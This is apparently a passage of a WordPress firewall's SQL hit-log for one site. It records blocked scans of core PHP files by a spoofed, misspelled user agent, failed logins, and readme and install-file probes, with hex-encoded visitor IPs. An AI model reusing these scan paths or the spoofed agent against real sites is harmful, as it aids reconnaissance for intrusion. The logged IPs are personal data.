User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3Bvc3QucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133325,1699888644.840540,1699888644.831000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/privacy-tools.php','http://eckankar-colorado.org/wp-admin/includes/privacy-tools.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3ByaXZhY3ktdG9vbHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133601,1699888539.284206,1699888539.275300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/locale.php','http://eckankar-colorado.org/wp-includes/locale.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2xvY2FsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133324,1699888645.176506,1699888645.167300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/revision.php','http://eckankar-colorado.org/wp-admin/includes/revision.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3JldmlzaW9uLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133617,1699888533.281909,1699888533.273300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/feed-rss2.php','http://eckankar-colorado.org/wp-includes/feed-rss2.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZlZWQtcnNzMi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133323,1699888645.512857,1699888645.503800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/schema.php','http://eckankar-colorado.org/wp-admin/includes/schema.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3NjaGVtYS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133322,1699888645.886602,1699888645.877000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/screen.php','http://eckankar-colorado.org/wp-admin/includes/screen.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3NjcmVlbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133321,1699888646.226568,1699888646.211000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/taxonomy.php','http://eckankar-colorado.org/wp-admin/includes/taxonomy.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3RheG9ub215LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133320,1699888646.566245,1699888646.557300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/template.php','http://eckankar-colorado.org/wp-admin/includes/template.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3RlbXBsYXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133319,1699888646.903673,1699888646.893900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/theme-install.php','http://eckankar-colorado.org/wp-admin/includes/theme-install.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3RoZW1lLWluc3RhbGwucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133318,1699888647.233726,1699888647.224800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/theme.php','http://eckankar-colorado.org/wp-admin/includes/theme.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3RoZW1lLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133218,1699888689.073809,1699888689.064500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/thuoc-nam/','http://eckankar-colorado.org/wp-content/themes/thuoc-nam/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3RodW9jLW5hbS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133176,1699888484.803707,1699888484.795000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-smtp.php','http://eckankar-colorado.org/wp-includes/class-smtp.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXNtdHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134725,1700192298.115051,1700192298.105700,0x00000000000000000000FFFF29D8BC5C,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/about.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134663,0.000000,1700168274.661812,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134664,0.000000,1700169017.556442,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134665,1700169555.058723,1700169555.036600,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/network/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsv\",\"category\":\"brute-force\",\"ssl\":1}'),(133256,1699888674.955931,1699888674.947200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps/class-wp-sitemaps-provider.php','http://eckankar-colorado.org/wp-includes/sitemaps/class-wp-sitemaps-provider.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzL2NsYXNzLXdwLXNpdGVtYXBzLXByb3ZpZGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133277,1699888665.579549,1699888665.565600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/getid3.php','http://eckankar-colorado.org/wp-includes/ID3/getid3.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9nZXRpZDMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133278,1699888665.137693,1699888665.123100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/getid3.lib.php','http://eckankar-colorado.org/wp-includes/ID3/getid3.lib.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9nZXRpZDMubGliLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133279,1699888663.995752,1699888663.986300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/wp-includes/','http://eckankar-colorado.org/wp-includes/wp-includes/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWluY2x1ZGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134335,1700062269.047855,1700062269.038000,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3dwLWxvZ2luLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134336,1700062261.789927,1700062261.767500,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/cgi-bin/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4vd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133619,1699888532.588024,1699888532.578100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/feed-rss.php','http://eckankar-colorado.org/wp-includes/feed-rss.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZlZWQtcnNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133600,1699888539.717648,1699888539.709000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/media-template.php','http://eckankar-colorado.org/wp-includes/media-template.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL21lZGlhLXRlbXBsYXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133352,1699888635.530567,1699888635.521700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-users-list-table.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-users-list-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLXVzZXJzLWxpc3QtdGFibGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134806,0.000000,1700290554.176014,0x00000000000000000000FFFF8D5F0B35,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134807,0.000000,1700292985.434930,0x00000000000000000000FFFF44B2A3DC,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134808,1700293629.485851,1700293629.478800,0x00000000000000000000FFFFD9A03CA2,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134785,1700249542.595907,1700249542.586500,0x00000000000000000000FFFFACC8A100,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/install.php?step=1',NULL,NULL,'blocked:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"506\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWFkbWluL2luc3RhbGwucGhw\",\"path\":\"L3dwLWFkbWluL2luc3RhbGwucGhw\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134786,1700253537.667363,1700253537.645300,0x00000000000000000000FFFF5B5CF799,0,403,0,0,0,'https://eckankar-colorado.org/about.php?ac=&api=&path=&t=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 